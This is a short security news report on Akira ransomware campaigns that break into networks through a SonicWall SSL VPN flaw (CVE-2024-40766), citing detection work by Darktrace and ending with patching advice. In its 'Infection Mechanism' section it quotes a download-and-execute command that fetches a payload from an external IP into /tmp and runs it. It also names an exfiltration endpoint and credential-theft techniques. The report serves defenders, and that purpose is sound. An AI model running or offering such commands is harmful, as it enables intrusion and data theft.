Threat actors have reemerged in mid-2025 leveraging previously disclosed vulnerabilities in SonicWall SSL VPN appliances to deploy Akira ransomware on enterprise networks.
Beginning in July, multiple incidents of initial access via unpatched SonicWall devices were reported across North America and EMEA. Attackers exploited CVE-2024-40766, an access control flaw in SonicOS versions up to 7.0.1-5035, enabling unauthenticated remote code execution.
Once inside a network, adversaries performed reconnaissance, credential harvesting, and lateral movement before detonating the ransomware payload.
By August, the pace of attacks accelerated, with affected organizations spanning manufacturing, education, and healthcare sectors.
Data exfiltration often preceded encryption, with threat actors siphoning sensitive files to rare external SSH endpoints before network encryption commenced.
Darktrace analysts identified multiple signs of compromise, including anomalous DCE-RPC requests to the epmapper service and unexpected WinRM sessions to domain controllers, long before ransom notes appeared.
Their Managed Detection and Response (MDR) platform linked these early indicators to the broader Akira campaign, enabling rapid incident triage and containment.
The Akira ransomware strain, first observed in March 2023, has evolved from Windows-only targeting to include Linux variants affecting VMware ESXi hosts, making it an attractive option for attackers seeking maximum disruption.
.webp)
Under its Ransomware-as-a-Service model, affiliates deploy double-extortion tactics, encrypting file systems and threatening public release of exfiltrated data.
In each SonicWall SSD VPN compromise, operators ensured persistence by reusing stolen credentials and exploiting misconfigurations in Virtual Office Portal setups, bypassing multi-factor configurations even on patched devices.
Infection Mechanism
The initial compromise typically begins with exploitation of CVE-2024-40766 in SonicWall SSL VPN.
Attackers send crafted HTTP requests to the vulnerable login.host endpoint, bypassing authentication controls.
Once a foothold is established, a malicious payload named vmwaretools is downloaded from a hostile cloud endpoint using a simple wget command:-
wget http[:]//137.184.243.69/vmwaretools - O / tmp / vmwaretools
chmod + x / tmp / vmwaretools
/ tmp / vmwaretoolsThis payload installs a loader that registers a backdoor service and harvests administrative credentials via Kerberos PKINIT and UnPAC-the-hash techniques, extracting NTLM hashes without triggering standard credential audit logs.
After credential extraction, operators initiate lateral movement to ESXi servers over RDP and SSH, exfiltrate data via SSH to endpoint 66.165.243.39, then execute the ransomware binary on Windows and ESXi hosts.
Maintaining stealth, the loader disables local logging and leverages legitimate administrative tools such as WinRM and Rclone for intra-network communication.
By the time encryption begins, attackers have already ensured persistence through backdoored services and stolen credentials for future access.
.webp)
Organizations are urged to apply SonicWall patches released in August 2024, enforce strict credential hygiene, and monitor for anomalous external SSH traffic.
Early detection of unusual DCE-RPC, WinRM, and certificate download events remains critical to disrupting this evolving Akira campaign.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
